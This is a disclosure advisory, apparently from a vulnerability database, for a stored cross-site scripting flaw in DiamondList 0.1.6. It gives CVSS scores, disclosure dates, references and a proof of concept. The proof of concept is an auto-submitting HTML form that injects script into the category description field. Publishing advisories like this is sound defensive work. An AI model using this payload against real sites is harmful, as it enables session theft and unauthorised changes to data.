DiamondList XSS vulnerability

2010.08.18
Credit: htbridge
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Vulnerability ID: HTB22518 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_diamondlist_1.html Product: DiamondList Vendor: Hulihan Applications ( http://hulihanapplications.com/projects/diamondlist ) Vulnerable Version: 0.1.6 and Probably Prior Versions Vendor Notification: 22 July 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Fixed by Vendor Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "user/main/update_category" script to properly sanitize user-supplied input in "category[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC is available: <form action="http://host/user/main/update_category/CATEGORY_ID" method="post" name="main" > <input type="hidden" name="category[name]" value="some cat name" /> <input type="hidden" name="category[description]" value='descr<script>alert(document.cookie)</script>' /> <input type="hidden" name="commit" value="Update" /> </form> <script> document.main.submit(); </script> Solution: Upgrade to the most recent version

References:

http://www.vupen.com/english/advisories/2010/2025
http://www.securityfocus.com/bid/42252
http://www.securityfocus.com/archive/1/archive/1/512897/100/0/threaded
http://www.securityfocus.com/archive/1/512892
http://www.htbridge.ch/advisory/xss_vulnerability_in_diamondlist_1.html
http://www.htbridge.ch/advisory/xss_vulnerability_in_diamondlist.html
http://secunia.com/advisories/40873
http://packetstormsecurity.org/1008-exploits/diamondlist-xssxsrf.txt
http://dev.hulihanapplications.com/issues/show/213
http://dev.hulihanapplications.com/issues/show/211


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top